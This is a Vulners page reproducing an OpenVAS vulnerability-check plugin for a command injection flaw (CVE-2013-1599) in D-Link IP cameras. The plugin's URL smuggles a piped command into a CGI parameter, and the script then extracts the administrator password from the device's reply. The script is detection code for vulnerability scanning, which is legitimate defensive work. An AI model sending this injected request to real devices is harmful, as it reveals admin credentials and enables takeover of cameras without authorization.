Lucene search
+L

Multiple D-Link Products Command Injection Vulnerability (Nov 2014) - Active Check

🗓️ 04 Nov 2014 00:00:00Reported by Copyright (C) 2014 Greenbone AGType 
openvas
 openvas
🔗 plugins.openvas.org👁 621 Views

Multiple D-Link products command injection vulnerability. Allows attacker to execute arbitrary commands

Related
Refs
Code
ReporterTitlePublishedViews
Family
zdt
zdt
D-Link IP Cameras Injection / Bypass Vulnerabilities
30 Apr 201300:00
zdt
circl
Circl
CVE-2013-1599
1 May 201300:00
circl
coresecurity
Core Security
D-Link IP Cameras Multiple Vulnerabilities
29 Apr 201300:00
coresecurity
checkpoint_advisories
Check Point Advisories
Dlink IP Camera Authenticated Arbitrary Command Execution - Ver2 (CVE-2013-1599)
26 Mar 201500:00
checkpoint_advisories
cve
CVE
CVE-2013-1599
28 Jan 202019:54
cve
cvelist
Cvelist
CVE-2013-1599
28 Jan 202019:54
cvelist
exploitdb
Exploit DB
D-Link IP Cameras - Multiple Vulnerabilities
1 May 201300:00
exploitdb
exploitpack
exploitpack
D-Link IP Cameras - Multiple Vulnerabilities
1 May 201300:00
exploitpack
nvd
NVD
CVE-2013-1599
28 Jan 202020:15
nvd
packetstorm
Packet Storm
D-Link IP Cameras Injection / Bypass
29 Apr 201300:00
packetstorm
Rows per page
SourceLink
securityfocuswww.securityfocus.com/bid/59564
# SPDX-FileCopyrightText: 2014 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if (description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.105104");
  script_version("2026-06-17T07:24:12+0000");
  script_tag(name:"last_modification", value:"2026-06-17 07:24:12 +0000 (Wed, 17 Jun 2026)");
  script_tag(name:"creation_date", value:"2014-11-04 13:38:34 +0100 (Tue, 04 Nov 2014)");
  script_tag(name:"cvss_base", value:"10.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_tag(name:"severity_vector", value:"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_tag(name:"severity_origin", value:"NVD");
  script_tag(name:"severity_date", value:"2021-04-27 19:52:00 +0000 (Tue, 27 Apr 2021)");

  script_cve_id("CVE-2013-1599");

  script_tag(name:"qod_type", value:"remote_vul");

  script_tag(name:"solution_type", value:"VendorFix");

  script_name("Multiple D-Link Products Command Injection Vulnerability (Nov 2014) - Active Check");

  script_category(ACT_ATTACK);

  script_family("Web application abuses");
  script_copyright("Copyright (C) 2014 Greenbone AG");
  script_dependencies("gb_get_http_banner.nasl");
  script_require_ports("Services/www", 80);
  script_mandatory_keys("dcs-lig-httpd/banner");

  script_tag(name:"summary", value:"Multiple D-Link products are prone to a command injection
  vulnerability.");

  script_tag(name:"vuldetect", value:"Sends a crafted HTTP GET request and checks the response.");

  script_tag(name:"impact", value:"Exploiting this issue could allow an attacker to execute
  arbitrary commands in the context of the affected device.");

  script_tag(name:"solution", value:"Ask the Vendor for an update.");

  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/59564");

  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("port_service_func.inc");

port = http_get_port( default:8080 );

banner = http_get_remote_headers( port:port );

if( ! banner || banner !~ "Server\s*:\s*dcs-lig-httpd" )
  exit( 0 );

url = "/cgi-bin/rtpd.cgi?echo&AdminPasswd_ss|tdb&get&HTTPAccount";

req = http_get( port:port, item:url );
res = http_keepalive_send_recv( port:port, data:req );

if( res =~ "^HTTP/1\.[01] 200" && "AdminPasswd_ss=" >< res ) {
  password = eregmatch( pattern:'AdminPasswd_ss="([^"]+)"', string:res );
  if( ! isnull( password[1] ) ) {
    report = 'By requesting the URL "' + url + '" it was possible to retrieve the Admin password "' +
             password[ 1 ] + '"';
  }
  security_message( port:port, data:report );
  exit(0);

}

exit( 99 );

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Jun 2026 00:00Current
8.4High risk
Vulners AI Score8.4
CVSS 3.19.8
CVSS 210
EPSS0.40353
621